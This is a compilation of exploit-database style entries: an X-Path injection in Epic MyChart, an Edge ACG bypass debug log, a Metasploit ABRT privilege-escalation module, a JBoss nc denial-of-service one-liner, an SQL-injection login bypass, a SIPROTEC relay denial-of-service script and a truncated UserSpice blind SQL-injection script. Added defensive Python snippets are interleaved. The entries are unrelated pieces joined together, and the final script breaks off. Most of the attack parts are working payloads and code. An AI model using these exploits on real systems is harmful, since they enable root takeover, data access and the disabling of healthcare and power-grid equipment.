
# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272

Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."

The MyChart software contains an X-Path injection due to the lack of sanitization for the GET parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.

EPIC was quick to respond to contact and patch the vulnerability in MyChart.

Below are two proofs of concept:

Proof of concept 1:

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)

Proof of concept 2 (operations):

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE
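
The mitigation pattern for this class of bug, as an added example (not Epic's code or patch): validate `topic` against an allowlist grammar, resolve it without concatenating it into an XPath string, and flag logged requests whose `topic` fails the same grammar. The XML layout, the `TOPIC_RE` grammar, the function names and the log-line format are assumptions; the log lines are constructed from the PoC URLs above.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the XML document of static display strings.
HELP_XML = """<help>
  <topic id="COMPONENT^COOKIEENABLE">How to enable cookies</topic>
  <topic id="COMPONENT^LOGIN">How to sign in</topic>
</help>"""

# Assumed grammar for a legitimate topic: upper-case tokens joined by '^'.
TOPIC_RE = re.compile(r"[A-Z0-9_]+(?:\^[A-Z0-9_]+)*")

# Index built once from the parsed tree, so a lookup is a dictionary hit and
# the request value is never pasted into an XPath expression.
_TOPICS = {el.get("id"): el.text for el in ET.fromstring(HELP_XML).iter("topic")}


def build_xpath_unsafe(topic):
    """The vulnerable pattern: request data concatenated into the query."""
    return '//topic[@id="%s"]' % topic


def lookup_topic(topic):
    """Hardened lookup: reject anything outside the grammar, then exact match."""
    if not isinstance(topic, str) or not TOPIC_RE.fullmatch(topic):
        return None
    return _TOPICS.get(topic)


def flag_requests(log_lines):
    """Return the decoded topic of every help.asp request that fails TOPIC_RE."""
    flagged = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])
        if not url.path.lower().endswith("/help.asp"):
            continue
        for topic in parse_qs(url.query, keep_blank_values=True).get("topic", []):
            if not TOPIC_RE.fullmatch(topic):
                flagged.append(topic)
    return flagged


# Constructed access-log lines (method, URL, status) based on the PoC requests.
SAMPLE_LOG = [
    "GET /mychart/help.asp?topic=COMPONENT^COOKIEENABLE 200",
    "GET /mychart/help.asp?topic=COMPONENT^COOKIEENABLE%22%20AND%207900=7900"
    "%20AND%20(%22LygB%22=%22LygB 200",
    "GET /mychart/help.asp?topic=COMPONENT^COOKIEENABLE%22%20AND%207900=8000"
    "%20AND%20(%22LygB%22=%22LygB 200",
    "GET /mychart/default.asp 200",
]

if __name__ == "__main__":
    poc = 'COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB'
    print(build_xpath_unsafe(poc))   # the injected quote ends the literal early
    print(lookup_topic(poc))         # rejected by the allowlist
    for topic in flag_requests(SAMPLE_LOG):
        print("suspicious topic:", topic)
```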
            
Background:

To implement ACG (https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/#VM4y5oTSGCRde3sk.97), Edge uses a separate process for JIT compiling. This JIT Process is also responsible for mapping native code into the requesting Content Process.

In order to be able to write JITted (executable) data into the Content Process, JIT Process does the following:

1. It creates a shared memory object using CreateFileMapping()
2. It maps it into Content Process as PAGE_EXECUTE_READ and in the JIT process as PAGE_READWRITE using MapViewOfFile2(). At this point the memory is reserved, but not yet committed.
3. When individual pages need to be written to they are first allocated from the region in step 2 using VirtualAllocEx(). This also marks the memory as committed.

The issue:

If a content process is compromised and the content process can predict on which address JIT process is going to call VirtualAllocEx() next (note: it is fairly predictable), content process can:

1. Unmap the shared memory mapped above using UnmapViewOfFile()
2. Allocate a writable memory region on the same address JIT server is going to write and write a soon-to-be-executable payload there.
3. When JIT process calls VirtualAllocEx(), even though the memory is already allocated, the call is going to succeed and the memory protection is going to be set to PAGE_EXECUTE_READ. 

Note #1: The content written in step 2 is going to survive the memory protection change.
Note #2: JIT server is going to write the JITted payload into its own "side" of the shared memory, so the content in the Content Process is not going to get immediately overwritten.

See the debug log below for a demonstration.

Debug log:

Let's attach one instance of WinDBG to JIT process and another to a Content Process.

Let's also verify that ACG is indeed applied for the Content Process. We can do this using Get-ProcessMitigation PowerShell command. See the output in the screenshot (note the "BlockDynamicCode: ON" field).

Now, in JIT Process, let's set a breakpoint on VirtualAllocEx() and wait.

0:020> bp kernelbase!virtualallocex
0:020> g

Soon the breakpoint is hit.

Breakpoint 0 hit
KERNELBASE!VirtualAllocEx:
00007fff`5590e170 4883ec38        sub     rsp,38h

We can examine the call stack to see where we are - we see we are in the Encode phase of ServerRemoteCodeGen() which is a function that Content Process calls on the JIT server when it wants to JIT a function or a loop body.

0:011> k
 # Child-SP          RetAddr           Call Site
00 000000c2`48cfcfe8 00007fff`4dff3104 KERNELBASE!VirtualAllocEx
01 000000c2`48cfcff0 00007fff`38752dcd EShims!NS_ACGLockdownTelemetry::APIHook_VirtualAllocEx+0x14
02 000000c2`48cfd030 00007fff`38752a16 chakra!Memory::PreReservedSectionAllocWrapper::Alloc+0xd5
03 000000c2`48cfd0b0 00007fff`3875233e chakra!Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper>::AllocDecommitPages<BVStatic<272>,1>+0xea
04 000000c2`48cfd150 00007fff`38752464 chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::TryAllocDecommittedPages<1>+0x8e
05 000000c2`48cfd210 00007fff`38751e7a chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::SnailAllocPages<1>+0x4c
06 000000c2`48cfd2d0 00007fff`38751488 chakra!Memory::CustomHeap::CodePageAllocators<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocPages+0x72
07 000000c2`48cfd340 00007fff`38751210 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocNewPage+0x68
08 000000c2`48cfd3c0 00007fff`38750e14 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::Alloc+0x9c
09 000000c2`48cfd470 00007fff`38750cae chakra!EmitBufferManager<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper,CriticalSection>::NewAllocation+0x58
0a 000000c2`48cfd500 00007fff`388599dc chakra!JITOutput::RecordOOPNativeCodeSize+0x8e
0b 000000c2`48cfd590 00007fff`388a5506 chakra!Encoder::Encode+0x9dc
0c 000000c2`48cfd710 00007fff`389904e5 chakra!Func::TryCodegen+0x356
0d 000000c2`48cfdfb0 00007fff`3877c00e chakra!Func::Codegen+0xed
0e 000000c2`48cfe3e0 00007fff`3877be54 chakra!<lambda_869fb2da08ff617a0f58153cb1331989>::operator()+0x166
0f 000000c2`48cfe500 00007fff`3877bde2 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x54
10 000000c2`48cfe550 00007fff`3877bd85 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x4e
11 000000c2`48cfe5c0 00007fff`57006d13 chakra!ServerRemoteCodeGen+0x75
12 000000c2`48cfe630 00007fff`57069390 RPCRT4!Invoke+0x73
13 000000c2`48cfe690 00007fff`56f93718 RPCRT4!Ndr64StubWorker+0xbb0
14 000000c2`48cfed40 00007fff`56fb73b4 RPCRT4!NdrServerCallNdr64+0x38
15 000000c2`48cfed90 00007fff`56fb654e RPCRT4!DispatchToStubInCNoAvrf+0x24
16 000000c2`48cfede0 00007fff`56fb6f84 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1be
17 000000c2`48cfeeb0 00007fff`56fc0693 RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x154
18 000000c2`48cfef50 00007fff`56fc1396 RPCRT4!LRPC_SCALL::DispatchRequest+0x183
19 000000c2`48cff030 00007fff`56fbd11e RPCRT4!LRPC_SCALL::HandleRequest+0x996
1a 000000c2`48cff140 00007fff`56fbe843 RPCRT4!LRPC_ADDRESS::HandleRequest+0x34e
1b 000000c2`48cff1f0 00007fff`56fecc58 RPCRT4!LRPC_ADDRESS::ProcessIO+0x8a3
1c 000000c2`48cff330 00007fff`594665ae RPCRT4!LrpcIoComplete+0xd8
1d 000000c2`48cff3d0 00007fff`594aeed9 ntdll!TppAlpcpExecuteCallback+0x22e
1e 000000c2`48cff450 00007fff`5946471c ntdll!TppDirectExecuteCallback+0xb9
1f 000000c2`48cff4c0 00007fff`57ea1fe4 ntdll!TppWorkerThread+0x47c
20 000000c2`48cff850 00007fff`5949ef91 KERNEL32!BaseThreadInitThunk+0x14
21 000000c2`48cff880 00000000`00000000 ntdll!RtlUserThreadStart+0x21

If we examine the registers we see the second param is 000002854f18c000 - this is the address VirtualAllocEx() is attempting to allocate.

0:011> r
rax=0000000040000010 rbx=000002854f18c000 rcx=0000000000000724
rdx=000002854f18c000 rsi=0000000000000008 rdi=0000024038924de0
rip=00007fff5590e170 rsp=000000c248cfcfe8 rbp=0000024038924fe8
 r8=0000000000001000  r9=0000000000001000 r10=0000000000000001
r11=0000000000000007 r12=000002854f18c000 r13=0000000000000000
r14=000000000000000c r15=0000000000000000

Let's leave the JIT Process alone for a while and move into the Content Process. Let's examine the memory around address 000002854f18c000 using !vadump:

BaseAddress:       000002854f100000
RegionSize:        0000000000017000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f117000
RegionSize:        0000000000001000
State:             00001000  MEM_COMMIT
Protect:           00000001  PAGE_NOACCESS
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f118000
RegionSize:        0000000000074000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f18c000
RegionSize:        0000000000004000
State:             00002000  MEM_RESERVE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f190000
RegionSize:        0000000000010000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

We see some executable memory regions starting from 000002854f100000 which happens to be the base address of the shared memory in the Content Process. Let's unmap it.

0:084> r rip=kernelbase!unmapviewoffile
0:084> r rcx=000002854f100000

After unmapping it, let's allocate the desired address and set it to PAGE_READWRITE so that we can write to it.

0:084> r rip=kernelbase!virtualalloc
0:084> r rcx=000002854f18c000 # desired address
0:084> r rdx=1000 # size
0:084> r r8=3000 # MEM_RESERVE | MEM_COMMIT
0:084> r r9=4 # PAGE_READWRITE

After VirtualAlloc() finishes, we can see it returned 000002854f180000

0:084> r rax
rax=000002854f180000

The returned address is a bit lower than the one we requested, but it doesn't matter since the allocated region is also going to be larger than we requested so it's going to cover the desired address. Let's take a look at the memory map again:

BaseAddress:       000002854f100000
RegionSize:        0000000000080000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

BaseAddress:       000002854f180000
RegionSize:        000000000000d000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18d000
RegionSize:        000000000ff73000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

We can see that at address 000002854f180000 there is a region of size 000000000000d000 that has PAGE_READWRITE access. Since we can now write to this address, let's do it:

0:084> ea 000002854f18c000 "ACG bypass"

Now, let's go back to the JIT Server process and let VirtualAllocEx() finish. Once it does, let's go back into the Content Process and examine the memory again:

BaseAddress:       000002854f100000
RegionSize:        0000000000080000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

BaseAddress:       000002854f180000
RegionSize:        000000000000c000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18c000
RegionSize:        0000000000001000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18d000
RegionSize:        000000000ff73000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

We can now see some changes, specifically at address 000002854f18c000 there is now an executable memory region (PAGE_EXECUTE). Now we just need to make sure the content we wrote earlier is still there.

0:084> da 000002854f18c000
00000285`4f18c000  "ACG bypass"

That's it. We now have an executable page with the content we control, thus bypassing ACG.

A screenshot of WinDBG showing this final step is attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44096.zip
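
The state the JIT process would need to verify before committing a page, as an added example (not Microsoft's fix and not Chakra code): parse the `!vadump` records from the log above and require that the target page still belongs to a reserved, mapped section. The function names are assumptions; on a live system the same fields come from VirtualQueryEx().

```python
# Win32 constants, with the values shown in the !vadump output above.
MEM_COMMIT, MEM_RESERVE, MEM_FREE = 0x1000, 0x2000, 0x10000
MEM_PRIVATE, MEM_MAPPED = 0x20000, 0x40000
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80  # all PAGE_EXECUTE* protections

# Excerpts copied from the three Content Process memory maps in the log.
BEFORE = """\
BaseAddress:       000002854f18c000
RegionSize:        0000000000004000
State:             00002000  MEM_RESERVE
Type:              00040000  MEM_MAPPED
"""

HIJACKED = """\
BaseAddress:       000002854f100000
RegionSize:        0000000000080000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

BaseAddress:       000002854f180000
RegionSize:        000000000000d000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18d000
RegionSize:        000000000ff73000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS
"""

AFTER = """\
BaseAddress:       000002854f18c000
RegionSize:        0000000000001000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00020000  MEM_PRIVATE
"""

# rdx (address) and r8 (size) at the VirtualAllocEx() breakpoint in the log.
TARGET, SIZE = 0x2854F18C000, 0x1000


def parse_vadump(text):
    """Turn blank-line separated !vadump records into dicts of integers."""
    regions = []
    for block in text.strip().split("\n\n"):
        record = {}
        for line in block.splitlines():
            key, _, rest = line.partition(":")
            fields = rest.split()
            if fields:
                record[key.strip()] = int(fields[0], 16)
        if "BaseAddress" in record and "RegionSize" in record:
            regions.append(record)
    return regions


def safe_to_commit(regions, addr, size):
    """True only if [addr, addr+size) lies in a reserved, mapped region."""
    for region in regions:
        base = region["BaseAddress"]
        end = base + region["RegionSize"]
        if base <= addr and addr + size <= end:
            return (region.get("Type") == MEM_MAPPED
                    and region.get("State") == MEM_RESERVE)
    return False  # address not described by the dump: refuse


def private_executable(regions):
    """Base addresses of private (non-section) memory that is executable."""
    return [r["BaseAddress"] for r in regions
            if r.get("Type") == MEM_PRIVATE and r.get("Protect", 0) & EXEC_MASK]


if __name__ == "__main__":
    for name, dump in (("before", BEFORE), ("hijacked", HIJACKED)):
        verdict = safe_to_commit(parse_vadump(dump), TARGET, SIZE)
        print(name, "-> commit allowed:", verdict)
    print("private executable pages:",
          [hex(a) for a in private_executable(parse_vadump(AFTER))])
```

In this design JITted code reaches the Content Process only through the mapped section, so a private executable page inside the section's address range is the anomaly to alert on.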
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABRT raceabrt Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Fedora systems with
        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
        as the crash handler.

        A race condition allows local users to change ownership of arbitrary
        files (CVE-2015-3315). This module uses a symlink attack on
        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
        then adds a new user with UID=0 GID=0 to gain root privileges.
        Winning the race could take a few minutes.

        This module has been tested successfully on ABRT packaged version
        2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop
        19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.

        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy', # Discovery and C exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'DisclosureDate' => 'Apr 14 2015',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'References'     =>
        [
          [ 'CVE', '2015-3315' ],
          [ 'EDB', '36747' ],
          [ 'BID', '75117' ],
          [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],
          [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],
          [ 'URL', 'https://access.redhat.com/articles/1415483' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]
        ]
    ))
    register_options(
      [
        OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
        OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def timeout
    datastore['TIMEOUT']
  end

  def check
    if cmd_exec('lsattr /etc/passwd').include? 'i'
      vprint_error 'File /etc/passwd is immutable'
      return CheckCode::Safe
    end

    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
      vprint_error 'System is NOT configured to use ABRT for crash reporting'
      return CheckCode::Safe
    end
    vprint_good 'System is configured to use ABRT for crash reporting'

    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
      return CheckCode::Safe
    end
    vprint_good 'System does not appear to have been patched'

    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
      return CheckCode::Safe
    end
    vprint_good "Directory '/var/tmp/abrt' exists"

    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
      vprint_error 'abrt-ccpp service NOT running'
      return CheckCode::Safe
    end
    vprint_good 'abrt-ccpp service is running'

    abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1]
    unless abrt_version.blank?
      vprint_status "System is using ABRT package version #{abrt_version}"
    end

    CheckCode::Detected
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    cmd_exec "chmod +x '#{path}'"
    register_file_for_cleanup path
  end

  def exploit
    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    @chown_file = '/etc/passwd'

    if datastore['USERNAME'].blank?
      @username = rand_text_alpha rand(7..10)
    else
      @username = datastore['USERNAME']
    end

    # Upload Tavis Ormandy's raceabrt exploit:
    # - https://www.exploit-db.com/exploits/36747/
    # Cross-compiled with:
    # - i486-linux-musl-cc -static raceabrt.c
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'
    fd = ::File.open path, 'rb'
    executable_data = fd.read fd.stat.size
    fd.close

    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    upload_and_chmodx executable_path, executable_data

    # Change working directory to base_dir
    cmd_exec "cd '#{base_dir}'"

    # Launch raceabrt executable
    print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }

    # Check if we own /etc/passwd
    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
    end

    print_good "Success! '#{@chown_file}' is writable"

    # Add new user with no password
    print_status "Adding #{@username} user to #{@chown_file} ..."
    cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}"

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Execute payload executable
    vprint_status 'Executing payload...'
    cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\""
  end

  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
    end

    # Reinstate /etc/passwd root ownership and remove new user
    root_owns_passwd = false
    new_user_removed = false

    if session.type.to_s.eql? 'meterpreter'
      # Reinstate /etc/passwd root ownership
      session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""

      # Remove new user
      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""

      # Wait for clean up
      Rex.sleep 5

      # Check root ownership
      passwd_stat = session.fs.file.stat(@chown_file).stathash
      if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
        root_owns_passwd = true
      end

      # Check for new user in /etc/passwd
      passwd_contents = session.fs.file.open(@chown_file).read.to_s
      unless passwd_contents.include? "#{@username}:"
        new_user_removed = true
      end
    elsif session.type.to_s.eql? 'shell'
      # Reinstate /etc/passwd root ownership
      session.shell_command_token "chown root:root #{@chown_file}"

      # Remove new user
      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"

      # Check root ownership
      passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
      if passwd_owner.to_s.include? 'root'
        root_owns_passwd = true
      end

      # Check for new user in /etc/passwd
      passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
      unless passwd_user.to_s.include? "#{@username}:"
        new_user_removed = true
      end
    end

    unless root_owns_passwd
      print_warning "Could not reinstate root ownership of #{@chown_file}"
    end

    unless new_user_removed
      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
    end
  rescue => e
    print_error "Error during cleanup: #{e.message}"
  ensure
    super
  end
end
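
A host audit for the exposure conditions and the artefacts this module leaves behind, as an added example (not part of the Metasploit module or of ABRT): it mirrors the conditions in `check`, and looks for the UID 0 account with an empty password field, a non-root owner of /etc/passwd, and the blank line the `sed` cleanup leaves behind. The function names are assumptions and the sample passwd contents and core_pattern value are constructed.

```python
import os


def passwd_findings(passwd_text):
    """Return (line_number, code, account) for suspicious passwd lines."""
    findings = []
    for number, line in enumerate(passwd_text.splitlines(), start=1):
        if not line.strip():
            # The cleanup replaces the added entry with an empty line.
            findings.append((number, "blank-line", ""))
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((number, "malformed", fields[0]))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((number, "uid0", name))
        if password == "":
            findings.append((number, "empty-password", name))
    return findings


def abrt_exposed(core_pattern, spool_dir_exists, tmp_dir_exists):
    """Same conditions as the module's check: ABRT is the crash handler,
    /var/spool/abrt is absent and /var/tmp/abrt is present."""
    return ("abrt-hook-ccpp" in core_pattern
            and not spool_dir_exists
            and tmp_dir_exists)


def audit_host(passwd="/etc/passwd",
               core_pattern="/proc/sys/kernel/core_pattern"):
    """Run the checks against the local system and return a report dict."""
    st = os.stat(passwd)
    with open(passwd) as fh:
        entries = passwd_findings(fh.read())
    try:
        with open(core_pattern) as fh:
            pattern = fh.read()
    except OSError:
        pattern = ""
    return {
        "passwd_owner_ok": st.st_uid == 0 and st.st_gid == 0,
        "passwd_findings": entries,
        "abrt_exposed": abrt_exposed(pattern,
                                     os.path.isdir("/var/spool/abrt"),
                                     os.path.isdir("/var/tmp/abrt")),
    }


# Constructed samples: /etc/passwd while the added account exists, and
# after the module's sed-based cleanup has blanked that line.
PASSWD_DURING = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
    "qwhzkpt::0:0::/root:/bin/bash\n"
)
PASSWD_CLEANED = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
    "\n"
)
# Constructed core_pattern value that hands crashes to ABRT.
CORE_PATTERN = "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e"

if __name__ == "__main__":
    print(passwd_findings(PASSWD_DURING))
    print(passwd_findings(PASSWD_CLEANED))
    print(abrt_exposed(CORE_PATTERN, False, True))
```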
            
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)

# Date: 14-02-2018

# Exploit Author: Frank Spierings

# Vendor Homepage: https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started

# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/

# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19

# Tested on: Red Hat Enterprise Linux Server release 7.4 |

# CVE : CVE-2018-1041



This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.

The CPU will instantly spike after receiving this payload.



printf "\x00\x00\x00\x00" | nc <target> <port = 4447|9999>

`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
            
# Exploit Title: TV - Video Subscription - Authentication Bypass
# Dork: N/A
# Date: 2018-02-14
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit, an attacker can log in as any user without any authentication.
# # # # #
# Proof of Concept :

1) Go to the login page.

2) Username : anything@anything.anything
    Password : ' or 0=0 #
            
# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Date: 14.02.2018
# Exploit Author: M. Can Kurnaz
# Contact: https://twitter.com/0x43414e
# Vendor Homepage: https://www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
# CVE : CVE-2015-5374
# Vulnerability Details: 
# https://www.cvedetails.com/cve/CVE-2015-5374/
# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

#!/usr/bin/env python

import socket
import sys

print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')

if len(sys.argv) < 2:
	print('Usage: ' + sys.argv[0] + ' [target]')
	sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) 

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 50000))

print('Done, say goodbye!')
            
#!/usr/bin/env python
"""
Application UserSpice PHP user management
Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit
URL https://userspice.com
Date 1.2.2018
Author Dolev Farhi

About the App:
What makes userspice different from almost any other PHP User Management
Framework is that it has been designed from the
beginning to get out of your way so you can spend your time working on
your project

About the vulnerability:
Unsanitized input passed to removePermission parameter.
"""

import requests
import string
import sys

from bs4 import BeautifulSoup

userspice_host = '10.0.0.16'
userspice_user = 'admin'
userspice_pass = 'password'
userspice_login_url = 'http://%s//users/login.php' % userspice_host
userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' % userspice_host
guess_chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation


banner = """
-------------------------------------------------------
| userSpice <= 4.3 Blind SQL Injection Vulnerability" |
-------------------------------------------------------
"""

login_data = {
'dest':'',
'username':userspice_user,
'password':userspice_pass
}

payload = {
'process':'1',
'removePermission[]':'1',
'private':'Yes',
'changeTitle':''
}

s = requests.session()

def getCSRF(url):
